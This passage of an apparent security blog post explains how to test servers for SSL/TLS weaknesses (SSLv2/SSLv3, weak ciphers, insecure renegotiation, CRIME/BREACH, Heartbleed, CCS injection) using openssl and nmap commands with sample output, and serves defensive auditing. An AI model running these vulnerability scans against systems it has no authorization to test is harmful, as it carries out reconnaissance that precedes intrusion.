  • SSL Certificates
  • Renegotiation
  • Compression
  • Implementation Issues

SSLv2 Support 

SSLv2 was released twenty years ago and soon after discovered to have significant weaknesses which could allow an attacker to decrypt and modify communications. It was superseded a year later by SSLv3 which addressed these issues, but despite its age and short lifespan SSLv2 support is still surprisingly common.

To check whether SSLv2 is enabled on the remote host, the following command can be used:

openssl s_client -ssl2 -connect example.com:443

If SSLv2 is supported, the handshake will complete and server certificate information will be returned, as shown in the following response:

openssl s_client -ssl2 -connect 10.0.0.1:443

CONNECTED(00000003)
depth=0 /C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
verify error:num=18:self signed certificate
verify return:1
depth=0 /C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
verify return:1
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICnjCCAgugAwIBAgIJAPB2liVH7xRsMA0GCSqGSIb3DQEBBQUAMGwxCzAJBgNV
BAYTAkFVMREwDwYDVQQIDAhWaWN0b3JpYTESMBAGA1UEBwwJTWVsYm91cm5lMRAw
DgYDVQQKDAdDb250ZXh0MRAwDgYDVQQLDAdQbGF5cGVuMRIwEAYDVQQDDAlzc2xz
ZXJ2ZXIwHhcNMTQwMTE3MDMwNjAxWhcNMTcxMDEzMDMwNjAxWjBsMQswCQYDVQQG
EwJBVTERMA8GA1UECAwIVmljdG9yaWExEjAQBgNVBAcMCU1lbGJvdXJuZTEQMA4G
A1UECgwHQ29udGV4dDEQMA4GA1UECwwHUGxheXBlbjESMBAGA1UEAwwJc3Nsc2Vy
dmVyMIGbMA0GCSqGSIb3DQEBAQUAA4GJADCBhQJ+AJdlQF95PWaFnmN0hQd5BYUf
SALBHBDO+JkNIPj5evYEAoPql3Am6Uphv3Pxyd+scDowb7UrReH8dBltxfz0Id4V
3wpSJRdwo4Gx8xx27tLjDqbTaPKfSRWGpr0s2S2KJerr3XJvTDtWoiHN3zsx5kLU
qvKTm+3LNHp7DgwNAgMBAAGjUDBOMB0GA1UdDgQWBBS5W+orwrw8K5LuFRykGg9w
1DCanzAfBgNVHSMEGDAWgBS5W+orwrw8K5LuFRykGg9w1DCanzAMBgNVHRMEBTAD
AQH/MA0GCSqGSIb3DQEBBQUAA34AegQVwKLQseAu7krFdsrfL117Sfpk7BuucJXJ
nNbg9WRKFk5raikmp1nc5zLRZ4c6waDSX/rrT2g06IXSAJXmv5d2NYU+5YECJnY5
ApexOlQJvsunKXZdJvBC6FijyLGi8G9zbA5S++JQkXWtiiICPGF2afYI5ahBgGO2
hgE=
-----END CERTIFICATE-----
subject=/C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
issuer=/C=AU/ST=/L=/O=Context/OU=context/CN=sslserver
---
No client certificate CA names sent
---
Ciphers common between both SSL endpoints:
RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5
---
SSL handshake has read 807 bytes and written 233 bytes
---
New, SSLv2, Cipher is DES-CBC3-MD5
Server public key is 1000 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv2
    Cipher    : DES-CBC3-MD5
    Session-ID: 3BD641677102DBE9BDADF9B990D2D716
    Session-ID-ctx:
    Master-Key: D2AAB3751263EB53BAD83453D26A09DA1F700059FD16B510
    Key-Arg   : DB92A6A80BF4CA4A
    Start Time: 1390178607
    Timeout   : 300 (sec)
    Verify return code: 18 (self signed certificate)

If the server does not support SSLv2 the response will be a handshake failure error similar to the following:

CONNECTED(00000003)
458:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:428:

SSLv3 Support

Despite some issues, SSLv3 was considered secure (at least when configured correctly) until last year when the Google Security Team introduced their Padding Oracle On Downgraded Legacy Encryption (POODLE) attack. POODLE demonstrated that, under certain conditions, it is possible to conduct a "padding oracle" attack against ciphers using cipher-block chaining (CBC) mode. This may allow decryption of communications and disclosure of session cookies. As the only non-CBC cipher supported in SSLv3, RC4, is also known to be cryptographically weak, the conclusion is that SSLv3 should not be used for communications. The Google Security Team further showed that an attacker can force the client and server to downgrade to SSLv3 even if they would normally use TLS, meaning that it is important to ensure that SSLv3 is disabled completely.

To test whether a system supports SSLv3, the following OpenSSL command can be used:

openssl s_client -ssl3 -connect google.com:443

CONNECTED(00000003)
depth=2 /C=US/O=GeoTrust Inc./CN=GeoTrust Global CA
verify error:num=20:unable to get local issuer certificate
verify return:0
---
Certificate chain

--- Certificate details removed for brevity ---
---
New, TLSv1/SSLv3, Cipher is RC4-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv3
    Cipher    : RC4-SHA
    Session-ID: 6E461AEAD8C1516F9D8950A9B5E735F9882BFC6EA0838D81CFD41C01A3799A41
    Session-ID-ctx:
    Master-Key: 7E7680640BB7E2C83CBE87342727E0D09AC10EEEB095A8C0A2501EAE80FA1C20D3F3FE4346B1234057D6D506420273FA
    Key-Arg   : None
    Start Time: 1421296281
    Timeout   : 7200 (sec)
    Verify return code: 0 (ok)
---

A handshake failure error would indicate that SSLv3 is not supported and the server is not vulnerable to POODLE.

Cipher Suites

One of the main functions of the SSL/TLS protocols is to allow the client and server to negotiate a mutually acceptable "cipher suite" to use for the connection. The cipher suite chosen specifies a set of algorithms which the client and server will use to perform key exchange, encryption, and message authentication.

A cipher suite is typically described in a format similar to this:

TLS_RSA_WITH_AES_128_CBC_SHA

where RSA is the key exchange algorithm, AES_128_CBC is the encryption cipher (AES using a 128-bit key operating in Cipher-Block Chaining mode), and SHA is the Message Authentication Code (MAC) algorithm.
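Given that naming convention, splitting a suite name into its three components is mechanical. A small illustrative helper (note that for suites such as TLS_ECDHE_RSA_..., everything before WITH covers both key exchange and authentication):

```python
def split_cipher_suite(name: str):
    """Split an IANA-style cipher suite name into (key exchange, cipher, MAC).

    The key exchange (and authentication) algorithms come before "WITH",
    the MAC is the final token, and the cipher is everything in between.
    """
    body = name[4:] if name.startswith("TLS_") else name
    kex, rest = body.split("_WITH_")
    cipher, _, mac = rest.rpartition("_")
    return kex, cipher, mac

print(split_cipher_suite("TLS_RSA_WITH_AES_128_CBC_SHA"))
# ('RSA', 'AES_128_CBC', 'SHA')
```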

The cipher suites a server is configured to support should be dictated by its security requirements. The following guidelines are generally recommended as a baseline:

  • The key exchange algorithm should be restricted to those which provide "perfect forward secrecy", such as Ephemeral Diffie-Hellman (DHE) or Ephemeral Elliptic Curve Diffie-Hellman (ECDHE).
  • The cipher should not suffer from known cryptanalytic flaws. This rules out RC4 which has been known to have flaws for many years and in the past few years has been shown to be significantly weaker than originally thought.
  • The cipher should use at least a 128 bit key (which rules out DES and Triple-DES).
  • Cipher-Block Chaining (CBC) mode is prone to padding oracle attacks and should ideally be avoided altogether, but specifically it should not be used in conjunction with SSLv3 or TLSv1.0 as this can lead to vulnerability to the BEAST attack. An alternative is Galois Counter Mode (GCM) which is not affected by these problems and offers authenticated encryption.
  • The message authentication algorithm should ideally be SHA256. MD5 is known to be cryptographically weak and should be avoided, and SHA1 (just denoted SHA in the cipher suite specifications) has its own weaknesses which place attacks within the realm of possibility.
  • For all three algorithms, the NULL / anon setting should be avoided as these provide no security at all. "Export" algorithms should also be disabled as their short key lengths make them susceptible to brute-force attacks and other attacks such as the FREAK attack.
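As a rough illustration of the guidelines above, the obviously bad choices can be spotted from the suite name alone. The marker strings and reasons below are our own shorthand for this sketch, not an authoritative classification:

```python
# Illustrative only: substring checks against the guideline list above,
# using the OpenSSL/IANA naming conventions seen elsewhere in this post.
WEAK_MARKERS = {
    "RC4": "broken stream cipher",
    "DES": "key too short (also matches 3DES/DES40)",
    "MD5": "weak MAC",
    "NULL": "no protection at all",
    "anon": "no authentication",
    "EXPORT": "export-grade key length (FREAK)",
}

def weaknesses(suite: str):
    """Return the guideline violations a cipher suite name hints at."""
    return [reason for marker, reason in WEAK_MARKERS.items() if marker in suite]

print(weaknesses("TLS_DH_anon_EXPORT_WITH_RC4_40_MD5"))
```

Name-based checks are only a first pass; issues such as BEAST depend on the protocol version the suite is negotiated under, not just the suite itself.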

Nmap's "ssl-enum-ciphers" script can be used to produce a list of the supported cipher suites in the following way:

nmap --script ssl-enum-ciphers -p 443 example.com

Example

nmap --script ssl-enum-ciphers -p 443 10.0.0.1

Nmap scan report for 10.0.0.1
PORT    STATE SERVICE REASON
443/tcp open  https   syn-ack
| ssl-enum-ciphers:
|   SSLv3
|     Ciphers (8)
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - unknown strength
|       TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA - weak
|       TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 - broken
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - unknown strength
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - unknown strength
|     Compressors (1)
|       uncompressed
|   TLSv1.0
|     Ciphers (6)
|       TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA - unknown strength
|       TLS_DHE_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_DHE_RSA_WITH_AES_256_CBC_SHA - unknown strength
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA - strong
|       TLS_RSA_WITH_AES_128_CBC_SHA - strong
|       TLS_RSA_WITH_AES_256_CBC_SHA - unknown strength
|     Compressors (1)
|       uncompressed
|_ 

While nmap will give a strength rating for each supported cipher suite, the fast pace of change in SSL/TLS security means that these ratings should be manually reviewed.

SSL Certificates

SSL/TLS supports the use of authentication via X.509 certificates, which are often termed "SSL certificates" when used in this context. Server certificates enable the client to verify that it is connecting to the correct host. Though not usually used for HTTPS, SSL/TLS can also support mutual authentication in which the client proves its own identity through the provision of its own certificate.

Some of the main security properties which should be considered when setting up a certificate include:

  • "Not Before" - This gives the start date of the certificate and should be a date in the past.
  • "Not After" - This gives the expiry date of the certificate, after which it should not be trusted. It is therefore important to ensure that this is a date in the future. As the expiry date approaches, a new certificate should be issued to replace it.
  • "Signature Algorithm" - This is the algorithm used to ensure the certificate's integrity. MD5 has been shown to be inadequate for this, with collision attacks allowing fake, but valid, certificates to be generated. SHA1 is in the process of being phased out due to known weaknesses, with SHA2 hash functions being the preferred alternative.
  • "Public-Key" - The public key should be long enough to ensure that attacks are computationally infeasible. In the case of RSA, 2048 bit public keys are now considered a sensible minimum to protect against factoring attacks.
  • "Issuer" - This is the entity which has issued the certificate and should be a trusted party recognised by both the client and server. The issuer is typically a third-party certificate authority (such as DigiCert in the example above), though larger organisations often operate their own certificate authority to sign certificates for internal use. While it is possible to generate so-called "self-signed" certificates, these prevent the client from authenticating the server and open up the possibility of man-in-the-middle attacks in which an attacker dupes the client and/or server into communicating with the attacker rather than each other.
  • "Subject" and "Subject Alternative Name" - These should contain the DNS names necessary to tie the certificate to the hostname of the server running the SSL/TLS service. If these values are not valid domain names (or wildcard domains), then the client will be unable to determine whether or not the certificate is associated with the server in question and cannot therefore use it to authenticate the server.
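These fields can also be pulled and sanity-checked programmatically. The following is a minimal sketch using Python's standard ssl module; the date format matches that returned by getpeercert(), and the host in the usage comment is a placeholder:

```python
import socket
import ssl
from datetime import datetime, timezone

def days_until_expiry(not_after):
    """Parse a 'Not After' value as formatted by ssl.getpeercert()."""
    expiry = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z").replace(tzinfo=timezone.utc)
    return (expiry - datetime.now(timezone.utc)).days

def fetch_certificate(host, port=443):
    """Return the validated peer certificate as a dict of fields."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()

# Example usage (requires network access):
# cert = fetch_certificate("example.com")
# print(days_until_expiry(cert["notAfter"]), cert.get("subjectAltName"))
```

Note that create_default_context() already verifies the chain and hostname, so a handshake failure here is itself a useful finding.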

To view the details of a server's certificate, the following command can be used:

openssl s_client -connect example.com:443 | openssl x509 -noout -text

This will produce output similar to the following (here PayPal's certificate is shown):

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            0e:65:41:91:6c:e8:cf:b2:9b:7b:52:71:01:05:ba:c4
    Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA
        Validity
            Not Before: Dec 12 00:00:00 2014 GMT
            Not After : Dec 16 12:00:00 2016 GMT
        Subject: C=US, ST=California, L=San Jose, O=PayPal, Inc., OU=PayPal Production, CN=paypal.com
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:d5:c8:b2:65:07:ff:fb:71:0a:cf:a8:77:97:fc:
                    e1:a4:87:5d:79:29:03:e0:1a:5f:c2:f8:71:c9:ac:
                    bc:d3:16:e0:9c:2e:bb:d9:1c:5b:cc:90:7d:e3:54:
                    ab:53:79:50:37:63:b1:cb:68:56:ee:6a:5b:d2:10:
                    38:1a:35:f7:37:12:83:d9:72:51:9e:b7:f9:9c:1d:
                    b8:a9:e6:f3:27:bb:5b:8b:b9:be:fa:39:19:83:d9:
                    cd:66:69:1d:cc:8a:cb:59:b5:53:3e:ca:41:f6:ac:
                    89:4d:58:06:04:a5:e2:c9:94:05:26:6c:24:a6:81:
                    ca:4a:01:11:4c:a2:8d:83:7a:9a:2a:7d:16:93:ca:
                    a0:df:59:b8:e1:38:18:b2:bd:eb:77:6b:57:fb:7f:
                    d6:70:e1:2d:70:dd:cc:af:43:f0:de:a0:fc:2f:8e:
                    94:74:3c:4f:ae:ca:f6:f2:ab:09:7f:63:71:b6:27:
                    78:4d:f8:e1:e0:86:3a:81:9f:d4:55:45:27:ff:4d:
                    53:2f:99:43:28:ad:fa:c9:63:6f:64:28:36:d7:ea:
                    c3:00:50:88:86:a3:d0:83:ae:be:99:18:25:b2:44:
                    05:c6:e8:36:4a:fb:4d:ab:df:6d:0f:50:3f:80:fc:
                    38:ba:4c:53:c1:6d:48:22:68:7a:ed:6e:05:e4:9d:
                    58:ef
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Authority Key Identifier:
                keyid:51:68:FF:90:AF:02:07:75:3C:CC:D9:65:64:62:A2:12:B8:59:72:3B

            X509v3 Subject Key Identifier:
                1F:54:C7:2D:0E:D3:6C:C4:63:FE:66:1C:EA:8C:50:75:3A:01:8F:DE
            X509v3 Subject Alternative Name:
                DNS:paypal.com, DNS:www.paypal.com
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Server Authentication, TLS Web Client Authentication
            X509v3 CRL Distribution Points:

                Full Name:
                  URI:http://crl3.digicert.com/sha2-ha-server-g3.crl

                Full Name:
                  URI:http://crl4.digicert.com/sha2-ha-server-g3.crl

            X509v3 Certificate Policies:
                Policy: 2.16.840.1.114412.1.1
                  CPS: https://www.digicert.com/CPS

            Authority Information Access:
                OCSP - URI:http://ocsp.digicert.com
                CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt

            X509v3 Basic Constraints: critical
                CA:FALSE
    Signature Algorithm: sha256WithRSAEncryption
         3d:79:69:48:5d:f6:bc:4b:5f:81:f3:97:9d:61:e5:9c:46:b9:
         73:00:66:09:f1:8a:06:89:14:a3:25:ea:ba:a2:5d:ac:77:3a:
         8f:6a:8a:11:9b:c3:35:67:99:9f:9d:c2:c0:ac:9f:eb:24:58:
         c8:4a:be:07:31:30:8c:69:07:bc:ff:c0:5a:d1:17:c6:05:f7:
         75:ca:fe:cd:98:78:43:41:ac:14:75:f7:c9:10:f4:07:38:58:
         73:6a:84:58:1f:a9:31:7d:28:47:70:98:de:3f:d7:00:82:a6:
         5c:2e:5d:31:96:4a:06:82:a2:a0:02:95:fd:6f:ef:66:4a:57:
         50:c3:1a:84:48:26:47:73:6e:c8:d7:30:fb:75:11:d6:ee:67:
         7e:d4:15:b2:44:15:ef:ee:ab:ba:81:c2:f5:05:04:d1:f3:70:
         bb:96:41:03:eb:d1:e0:e4:3d:57:41:8d:3d:7a:df:f0:c1:68:
         6f:43:68:e1:8d:1e:19:7e:57:aa:49:43:28:2a:f1:8c:f7:0d:
         a4:6a:8c:18:75:6b:a4:cc:a7:2f:e5:21:d1:81:8c:d4:bc:f4:
         00:4c:f6:37:03:a3:61:33:b2:ea:15:34:48:53:83:48:57:6c:
         33:f2:b7:fb:f3:fc:ea:df:0d:d0:e2:49:01:b4:23:c9:3d:7a:
         f4:42:4f:98

Renegotiation

The SSL/TLS protocols allow the client and server to renegotiate new encryption keys during a session. A vulnerability was discovered in 2009 whereby an attacker could exploit a flaw in the renegotiation process and inject content into the start of the session, compromising the integrity of the session.

This is only possible if two conditions are met, namely that the server does not support secure renegotiation but does honour client-initiated renegotiations. These conditions can be checked for as described below:

Secure Renegotiation

The following demonstrates how to verify if a system supports secure renegotiation.

openssl s_client -connect example.com:443

A system that does not support secure renegotiation will report "Secure Renegotiation IS NOT supported" once the connection attempt completes, as in the following output:

CONNECTED(00000003)
139677333890704:error:1407F0E5:SSL routines:SSL2_WRITE:ssl handshake failure:s2_pkt.c:429:
---
no peer certificate available
---
No client certificate CA names sent
---
SSL handshake has read 0 bytes and written 36 bytes
---
New, (NONE), Cipher is (NONE)
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : SSLv2
    Cipher    : 0000
    Session-ID: 
    Session-ID-ctx: 
    Master-Key: 
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    Start Time: 1428910482
    Timeout   : 300 (sec)
    Verify return code: 0 (ok)
---
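When scripting this check, the decisive signal is the "Secure Renegotiation" flag in the s_client output. A minimal helper, assuming the output has already been captured as a string (e.g. via subprocess), might be:

```python
def supports_secure_renegotiation(s_client_output):
    """Inspect captured `openssl s_client` output for the secure renegotiation flag."""
    # Match the full phrase so "IS NOT supported" is not mistaken for "IS supported".
    return "Secure Renegotiation IS supported" in s_client_output
```

The exact-match string matters: a naive check for "Secure Renegotiation IS" would also match the negative case.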

Client Initiated Renegotiation

The following demonstrates how to check if client initiated renegotiation is supported.

openssl s_client -connect example.com:443

Once the connection is established, the server will wait for input. We can then issue an HTTP request line followed by R on a line of its own (ending with enter or return) to initiate a renegotiation:

openssl s_client -connect host:port
HEAD / HTTP/1.0
R
<Enter or Return key>


A system that does not support client initiated renegotiation will return an error and end the connection, or the connection will time out.

RENEGOTIATING
write:errno=104


A system that supports client initiated renegotiation will keep the connection active, and respond to further commands.  

Compression

The use of compression has been linked to two side channel attacks: CRIME and BREACH.

CRIME

The Compression Ratio Info-leak Made Easy (CRIME) attack is a side-channel attack against TLS compression. To carry out the attack, the attacker needs to exert partial control over the content of requests made by the client (e.g. by using a Cross-Site Scripting vulnerability to force the user's browser to issue requests). The attacker can then observe the compressed size of these requests on the network and from that infer the contents of the remainder of the request (e.g. session cookies) based on the level of compression achieved.
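The underlying leak can be reproduced offline with zlib. In the sketch below the "request" is a string containing both attacker-controlled data and a secret cookie (the cookie value is invented for illustration); only the compressed length is observed, as an eavesdropper would see it:

```python
import zlib

SECRET = "Cookie: sessionid=7a3f9c4b1e"  # invented secret for illustration

def observed_size(attacker_controlled):
    """Size on the wire: attacker data and the secret are compressed together."""
    request = attacker_controlled + "\r\n" + SECRET
    return len(zlib.compress(request.encode(), 9))

# A guess that echoes the secret deduplicates against it and compresses smaller,
# so the attacker learns about the cookie purely from ciphertext lengths.
matching = observed_size("Cookie: sessionid=7a3f9c")
wrong = observed_size("Cookie: tracking=9f24e81c")
print(matching < wrong)  # True
```

Repeating this comparison character by character is what allows CRIME to recover a cookie from compressed TLS records.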

To test whether a server supports TLS compression, and is vulnerable to CRIME, the following method can be used: 

openssl s_client -connect example.com:443

On the servers supporting compression, a response similar to the one below will be received, containing details about the compression. The lines "Compression: zlib compression" and "Compression: 1 (zlib compression)" indicate that the remote server is vulnerable to the CRIME attack. 

---
New, TLSv1/SSLv3, Cipher is DHE-RSA-AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: zlib compression
Expansion: zlib compression
SSL-Session:
    Protocol  : TLSv1.1
    Cipher    : DHE-RSA-AES256-SHA
    Session-ID: 50791A02E03E42F8983344B25C8ED4598620518D5C917A3388239AAACE991858
    Session-ID-ctx: 
    Master-Key: 9FEDB91F439775B49A5C49342FF53C3DD7384E4AFC33F9C6AFB64EA3D639CA57253AD7D059BA54E01581AD3A73306342
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 300 (seconds)
    TLS session ticket:
    0000 - 34 38 24 70 35 88 4a 68-0c 80 e6 c5 76 a1 0e ee   48$p5.Jh....v...
    0010 - 14 2e fb ef fa 42 f0 c1-58 ee 70 02 90 45 f4 8c   .....B..X.p..E..
    0020 - 7d 0b 2e 1e 71 70 b0 a2-cc 27 1b 13 29 cc f5 ee   }...qp...'..)...
    0030 - 84 43 98 fa b1 ae 83 dc-ff 6d aa 07 9f 7a 95 4f   .C.......m...z.O
    0040 - 44 68 63 21 72 d7 b9 18-97 d8 8e d7 61 7d 71 6f   Dhc!r.......a}qo
    0050 - a7 16 85 79 f9 a2 80 2a-b4 bc f9 47 78 6a b7 08   ...y...*...Gxj..
    0060 - f6 4f 09 96 7b e8 d4 9b-26 2d 1a fd 55 fe 6a ab   .O..{...&-..U.j.
    0070 - fc 8d 6d 87 7a 13 e1 a9-0a 05 09 d9 ce ea fe 70   ..m.z..........p
    0080 - 09 c9 5f 33 3c 5f 28 4e-20 3b 3a 10 75 c4 86 45   .._3<_(N ;:.u..E
    0090 - 1d 8b c8 a5 21 89 a1 12-59 b6 0f 55 e3 48 8f 91   ....!...Y..U.H..
    00a0 - 01 af 53 b6                                       ..S.

    Compression: 1 (zlib compression)
    Start Time: 1348073759
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---


For servers that have TLS compression disabled, the response will be similar to the following. The "Compression: NONE" shows that this server rejects usage of TLS-level compression. 

---
New, TLSv1/SSLv3, Cipher is ECDHE-RSA-AES128-GCM-SHA256
Server public key is 2048 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES128-GCM-SHA256
    Session-ID: 7E49EA6457B200B441A26C05F1AE9634AAF97284AC7A12EC58F69CEF5470B052
    Session-ID-ctx: 
    Master-Key: E035F082F5545424373A546A1F76D77673E8AEE018B3F0A3AFD7A3545746013664C18E6BB69F08BFAECA6C7FB3010C9C
    Key-Arg   : None
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 100800 (seconds)
    TLS session ticket:
    0000 - 66 72 6f 6e 74 70 61 67-65 61 61 61 61 61 61 61   frontpageaaaaaaa
    0010 - 89 55 c6 6a 92 c3 28 85-86 b0 ff c3 08 12 5a a8   .U.j..(.......Z.
    0020 - f2 ec f8 56 6d d3 29 99-7b 98 90 ef 57 fd c6 15   ...Vm.).{...W...
    0030 - ee a2 53 4b 43 ef 19 ee-41 25 1f 76 28 37 68 b6   ..SKC...A%.v(7h.
    0040 - 64 ca e7 3f 71 01 70 30-35 91 ef bc d8 19 20 4f   d..?q.p05..... O
    0050 - 9d 9e 2c ab 3f 35 5c 3f-65 f8 c6 9a a9 90 fa 60   ..,.?5\?e......`
    0060 - 4d 53 a1 b8 49 8c e7 61-e4 6c e1 51 8e 83 b5 25   MS..I..a.l.Q...%
    0070 - bc 9a 32 d8 fa be 16 a1-ae 3d 8c 0b e3 9e e4 78   ..2......=.....x
    0080 - 77 d7 91 6b a9 a0 01 2b-e1 98 33 d4 2c eb b3 84   w..k...+..3.,...
    0090 - f9 da 0f fa 77 df ac d6-08 b6 34 97 07 d9 b2 58   ....w.....4....X

    Start Time: 1428988675
    Timeout   : 300 (sec)
    Verify return code: 20 (unable to get local issuer certificate)
---

BREACH

The BREACH attack is analogous to the CRIME attack, but this time exploits the use of HTTP compression to again infer the contents of attacker-influenced requests.

To test whether a server supports deflate or compression, the following steps can be performed:

openssl s_client -connect example.com:443


Submitting the following will allow us to see if HTTP compression is supported by the server.

GET / HTTP/1.1
Host: example.com
Accept-Encoding: compress, gzip


If the response contains encoded data, similar to the following response, it indicates that HTTP compression is supported; therefore the remote host is vulnerable.

HTTP/1.1 200 OK
Server: nginx/1.1.19
Date: Sun, 19 Mar 2015 20:48:31 GMT
Content-Type: text/html
Last-Modified: Thu, 19 Mar 2015 23:34:28 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Content-Encoding: gzip
 
¬ =�A
�0
   �}E�� �/�փg�
�� oP��
��u4��22��,f&4Y��Į9 .�R�oKc�]�`|�o�r
0


A system which does not support deflate or compression will ignore the compress header request and respond with uncompressed data, indicating that it is not vulnerable.
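When automating this check, the decisive signal is the Content-Encoding response header. A small helper operating on an already-captured header mapping (so it makes no assumptions about how the request was sent) could look like:

```python
def response_indicates_compression(headers):
    """True if a response header mapping shows the body was compressed."""
    encoding = headers.get("Content-Encoding", "").lower()
    return encoding in {"gzip", "compress", "deflate", "br"}

# Example: a response to a request carrying "Accept-Encoding: compress, gzip"
print(response_indicates_compression({"Content-Encoding": "gzip"}))  # True
```

Note that BREACH additionally requires the response to reflect attacker input alongside a secret, so a compressed response is a prerequisite rather than proof of exploitability.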

Implementation Issues

SSL/TLS is only as secure as its implementation and a number of flaws have surfaced in TLS software in recent years. This has included TLS (not SSLv3) implementations which are vulnerable to POODLE, and timing attacks such as the Lucky-13 attack. We highlight two notable implementation vulnerabilities here, but more important than their details is the message that keeping SSL/TLS software patched and up-to-date is an essential piece of the security puzzle.

Heartbleed 

The Heartbleed bug is a result of a weakness in OpenSSL. It can be exploited to retrieve memory contents of a server/host running a vulnerable version of OpenSSL.

The following versions of OpenSSL are vulnerable:

• OpenSSL 1.0.1 through 1.0.1f (inclusive)

The following versions of OpenSSL are not vulnerable:

• OpenSSL 1.0.1g 

• OpenSSL 1.0.0 branch 

• OpenSSL 0.9.8 branch 
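As a rough first triage, a reported OpenSSL version string can be compared against the vulnerable range above. Banner-based checks are unreliable (distributions often backport fixes without changing the version), so this is only a sketch:

```python
def heartbleed_vulnerable(version):
    """Naive check of an OpenSSL base version string against 1.0.1 through 1.0.1f."""
    if not version.startswith("1.0.1"):
        return False  # the 1.0.0 and 0.9.8 branches are not affected
    suffix = version[len("1.0.1"):]
    # "1.0.1" itself and letter releases up to and including "f" are vulnerable
    return suffix == "" or (len(suffix) == 1 and "a" <= suffix <= "f")

print(heartbleed_vulnerable("1.0.1f"), heartbleed_vulnerable("1.0.1g"))  # True False
```

An active check such as the nmap script described below should always be preferred over version matching.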

There are many scripts publicly available that can be used to test whether a system is affected by this vulnerability. 

Servers accessible from the internet can be tested using Heartbleed test websites such as https://filippo.io/Heartbleed/, run by Filippo Valsorda.

Alternatively, Nmap (v6.46 and above) can be used to test for this bug using the ‘ssl-heartbleed.nse’ script.

nmap -p 443 --script ssl-heartbleed --script-args vulns.showall example.com


The output will be similar to the following:

PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed:
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt
|_      http://cvedetails.com/cve/2014-0160/


Change Cipher Spec Injection

A weakness exists in some versions of OpenSSL which can be exploited by intermediary third parties in order to retrieve sensitive information from encrypted communication.

Affected Versions:

• OpenSSL 1.0.1 through 1.0.1g

• OpenSSL 1.0.0 through 1.0.0l

• all versions before OpenSSL 0.9.8y

Testing requires publicly available tools, such as the ‘ssl-ccs-injection’ nmap script by Claudiu Perta, which can be downloaded from https://nmap.org/nsedoc/scripts/ssl-ccs-injection.html.

nmap -p 443 --script ssl-ccs-injection example.com

Sample Output

PORT    STATE SERVICE
443/tcp open  https
| ssl-ccs-injection:
|   VULNERABLE:
|   SSL/TLS MITM vulnerability (CCS Injection)
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before
|       1.0.1h does not properly restrict processing of ChangeCipherSpec
|       messages, which allows man-in-the-middle attackers to trigger use
|       of a zero-length master key in certain OpenSSL-to-OpenSSL
|       communications, and consequently hijack sessions or obtain
|       sensitive information, via a crafted TLS handshake, aka the
|       "CCS Injection" vulnerability.
|
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
|       http://www.cvedetails.com/cve/2014-0224
|_      http://www.openssl.org/news/secadv_20140605.txt

Conclusion

This post has presented some of the common attacks and misconfigurations which can undermine the security of SSL/TLS connections. Addressing these should be considered a minimum for anyone configuring SSL/TLS. It should be noted that other attacks exist which are not covered here and may require additional work to defend against adequately. Furthermore, a secure SSL/TLS configuration is a moving target, and additional or better attacks may be discovered in the future.

The recent US government data breach: big data techniques, a driving force behind a large scale cyber espionage programme?

$
0
0

